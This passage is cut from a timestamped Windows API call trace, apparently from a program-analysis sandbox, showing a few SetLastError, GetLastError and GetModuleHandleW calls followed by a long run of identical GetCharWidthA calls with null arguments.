SetLastError (dwErrCode=0x0) [0111.950] GetLastError () returned 0x0 [0111.950] SetLastError (dwErrCode=0x0) [0111.950] GetLastError () returned 0x0 [0111.950] SetLastError (dwErrCode=0x0) [0111.950] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0111.950] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.951] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.952] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.953] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.954] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.955] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.956] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.957] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, 